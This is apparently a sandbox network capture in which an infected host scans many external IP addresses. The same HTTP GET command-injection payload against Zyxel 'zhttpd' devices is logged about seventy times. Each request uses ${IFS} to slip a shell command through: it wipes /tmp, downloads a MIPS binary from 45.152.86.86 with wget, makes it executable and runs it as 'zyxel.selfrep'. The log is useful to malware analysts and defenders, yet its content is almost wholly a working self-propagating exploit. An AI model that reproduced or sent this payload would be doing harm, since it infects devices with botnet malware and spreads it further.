                                        Mar 31, 2024 09:20:36.308708906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1433192.168.2.2359740126.106.97.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308758020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1434192.168.2.2339660193.245.87.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308815002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1435192.168.2.2360236222.30.244.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308844090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1436192.168.2.2335930118.40.198.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308875084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1437192.168.2.2334684119.222.35.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308917999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1438192.168.2.2348378147.246.195.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308959961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1439192.168.2.235044262.76.4.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.309004068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1440192.168.2.2357244117.250.51.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305222988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1441192.168.2.235277243.137.11.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305265903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1442192.168.2.2345800172.204.142.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305295944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1443192.168.2.2342074109.149.71.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305363894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1444192.168.2.2353058208.89.241.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305414915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1445192.168.2.2346608150.190.91.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305449009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1446192.168.2.2346108203.164.243.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:37.305506945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1447192.168.2.234527261.218.58.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310144901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1448192.168.2.2359808113.246.223.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310192108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1449192.168.2.235443687.224.95.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310225010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1450192.168.2.2348066217.149.16.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310280085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1451192.168.2.2337264126.200.238.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310290098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1452192.168.2.2349812201.40.133.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310318947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1453192.168.2.2343172139.206.134.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310374975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1454192.168.2.2354624184.1.80.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310430050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1455192.168.2.233778696.84.184.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310472012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1456192.168.2.2339908198.139.83.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310520887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1457192.168.2.2343582223.182.153.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310564041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1458192.168.2.2333268136.62.220.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310606003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1459192.168.2.2360728168.248.83.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310638905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1460192.168.2.235442089.129.51.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310684919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1461192.168.2.234728077.122.229.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310738087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1462192.168.2.234765236.36.169.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310769081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1463192.168.2.235584861.58.55.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310834885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1464192.168.2.233656689.38.11.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310884953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1465192.168.2.2352842160.83.18.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310925961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1466192.168.2.2346604200.202.3.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.310986042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1467192.168.2.2340426115.158.217.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311028004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1468192.168.2.234517840.168.168.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311073065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1469192.168.2.233743692.165.6.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311115980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1470192.168.2.233351448.30.227.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311160088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1471192.168.2.235061017.49.52.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311208010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1472192.168.2.2354620211.225.135.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311259985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1473192.168.2.2358010123.47.28.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311295986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1474192.168.2.2349286201.204.137.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311330080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1475192.168.2.2338614119.45.213.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311359882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1476192.168.2.234002664.167.56.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311424017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1477192.168.2.2357332112.19.21.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311456919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1478192.168.2.2347532210.53.213.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311511040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1479192.168.2.2341308153.73.246.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311559916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1480192.168.2.2333306150.138.22.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311602116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1481192.168.2.2342924150.201.66.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311669111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1482192.168.2.2333424217.33.233.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311706066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1483192.168.2.2345124113.38.69.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311748028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1484192.168.2.2345236106.198.22.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311774015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1485192.168.2.2334418220.187.15.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311825037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1486192.168.2.2338638188.159.175.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311866999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1487192.168.2.235314466.25.16.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311913013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1488192.168.2.233546473.171.76.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311954975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1489192.168.2.234211275.214.239.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.311997890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1490192.168.2.235754864.160.80.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.312041044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1491192.168.2.2336128110.71.91.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.312062025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1492192.168.2.234669083.253.216.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.312112093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1493192.168.2.234026817.126.186.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.312155008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1494192.168.2.234068246.121.188.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.312199116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1495192.168.2.233900665.213.187.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.313786030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1496192.168.2.234592217.174.121.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.313822031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1497192.168.2.2340166119.187.80.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.313853025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1498192.168.2.2335622148.178.155.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.313899040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1499192.168.2.234061470.20.27.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.313939095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1500192.168.2.235529466.178.68.148443
                                        TimestampBytes transferredDirectionData
